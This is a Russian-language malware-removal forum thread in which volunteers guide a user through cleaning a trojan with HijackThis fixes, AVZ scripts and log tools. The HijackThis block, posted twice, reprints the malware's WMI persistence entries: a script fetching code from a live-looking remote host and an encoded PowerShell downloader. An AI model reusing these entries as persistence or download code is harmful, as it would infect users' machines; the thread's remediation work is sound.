Закрыто bat/trojandownloader.ftp.nok trojan парализует виндоус через 3 минуты работыРаботать возможно только в Safe mode

Статус
В этой теме нельзя размещать новые ответы.
Nur

Nur

Новый пользователь
Сообщения
7
Реакции
1
Баллы
3
bat/trojandownloader.ftp.nok trojan парализует виндоус через 3 минуты работы
Скан сделан в safe mode при нормальном старте зависает не успевая отсканироваться
Работать возможно только в Safe mode
 

Вложения

Sandor

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
4,814
Реакции
1,732
Баллы
503
Здравствуйте!

1.
Пролечите систему с помощью Kaspersky Virus Removal Tool.

2.
"Пофиксите" в HijackThis:
Код:
O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.0814ok.info:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");f(1730 bytes)
O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3
Перезагрузите систему вручную.

3.
Соберите новый CollectionLog (попробуйте в нормальном режиме).
 
Последнее редактирование:
Nur

Nur

Новый пользователь
Сообщения
7
Реакции
1
Баллы
3
Благодарю за оперативность
Приступил к скану Kasp
 
Nur

Nur

Новый пользователь
Сообщения
7
Реакции
1
Баллы
3
Здравствуйте!

1.
Пролечите систему с помощью Kaspersky Virus Removal Tool.

2.
"Пофиксите" в HijackThis:
Код:
O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.0814ok.info:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");f(1730 bytes)
O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3
Перезагрузите систему вручную.

3.
Соберите новый CollectionLog (попробуйте в нормальном режиме).
Сделал все как сказали

В нормальном режиме работает также 3-5 минут потом все зависает

Каперский наше 11 вирусов все удалил при повторном скане ничего не обнаруживает43413
 
Последнее редактирование:
akok

akok

Команда форума
Администратор
Сообщения
16,514
Реакции
13,119
Баллы
2,203
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Код:
  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Windows\debug\item.dat','');
 QuarantineFile('C:\Windows\TEMP\cpuz136\cpuz136_x64.sys','');
 DeleteFile('C:\Windows\TEMP\cpuz136\cpuz136_x64.sys','32');
 DeleteFile('C:\Windows\debug\item.dat','32');
 DeleteService('cpuz136');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start','command');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start1','command');
  BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.
Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ SkyDrivePro1 (ErrorConflict): (no name) -  - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ SkyDrivePro2 (SyncInProgress): (no name) -  - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ SkyDrivePro3 (InSync): (no name) -  - (no file)
Вы использовали устаревшую версию автологера, скачайте по этой ссылке http://tools.safezone.cc/drongo/test/AutoLogger-test.zip и подготовьте новый комплект логов (должно нормально отработать при обычной загрузке системы)
 
Nur

Nur

Новый пользователь
Сообщения
7
Реакции
1
Баллы
3
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Код:
  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
QuarantineFile('C:\Windows\debug\item.dat','');
QuarantineFile('C:\Windows\TEMP\cpuz136\cpuz136_x64.sys','');
DeleteFile('C:\Windows\TEMP\cpuz136\cpuz136_x64.sys','32');
DeleteFile('C:\Windows\debug\item.dat','32');
DeleteService('cpuz136');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start','command');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start1','command');
  BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
BC_ImportALL;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.
Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ SkyDrivePro1 (ErrorConflict): (no name) -  - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ SkyDrivePro2 (SyncInProgress): (no name) -  - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ SkyDrivePro3 (InSync): (no name) -  - (no file)
Вы использовали устаревшую версию автологера, скачайте по этой ссылке http://tools.safezone.cc/drongo/test/AutoLogger-test.zip и подготовьте новый комплект логов (должно нормально отработать при обычной загрузке системы)
Все сделал
В карантин отправил

В обычном режиме также зависает
Логи снять не успевает
Не дает работать вообще
 

Вложения

Sandor

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
4,814
Реакции
1,732
Баллы
503
Файл
C:\Users\Nur\Downloads\adwcleaner_7.3.exe
не помните откуда скачивали?

Скачайте AutorunsVTchecker. Распакуйте и запустите. Не дожидаясь окончания сканирования,
  1. Скачайте Universal Virus Sniffer (uVS)
  2. Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.
    !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.
  4. Дождитесь окончания работы программы и прикрепите лог к посту в теме.
    !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".
Подробнее читайте в руководстве Как подготовить лог UVS.

Пробуйте в нормальном режиме. Если не получится, делайте в безопасном.
 
Nur

Nur

Новый пользователь
Сообщения
7
Реакции
1
Баллы
3
Насчет ADW Cleanera не помню
Все началось вчера когда начал качать ПО для точки доступа чтобы через пк раздовать WIFI (после перезагрузки была еще одна учетка ADMIN$ удалил ее и комп вис)

Компьютер стал вести себя лучше уже

В норм режиме работает не виснет иногда постреливает ESET ругается на трояны

Но уже значительно лучше блин даже не думал что обращаюсь и вот так по инструкции реально починить ПК:Bye:

Прикрепляю отчеты
 

Вложения

akok

akok

Команда форума
Администратор
Сообщения
16,514
Реакции
13,119
Баллы
2,203
Не тот лог немного, а пока исправьте
------------------------------- [ Windows ] -------------------------------
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^


Ждем лог UVS.
 
thyrex

thyrex

Ассоциация VN/VIP
VIP
Сообщения
2,454
Реакции
2,473
Баллы
593
Подозреваю, что все решилось после запроса мною на Вирусинфо лога TDSSkiller, который и убил буткит.

Nur, не стоит бегать по разным форумам с одной проблемой.
 
akok

akok

Команда форума
Администратор
Сообщения
16,514
Реакции
13,119
Баллы
2,203
Тогда тут тему закрываю, долечивайтесь на вирусинфо
 
Nur

Nur

Новый пользователь
Сообщения
7
Реакции
1
Баллы
3
Ладно сори просто для полной картины и для разностороннего рассмотрения дела

Все равно все ребята молодцы

Большое вам спасибо
 
  • Like
Реакции: akok
Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу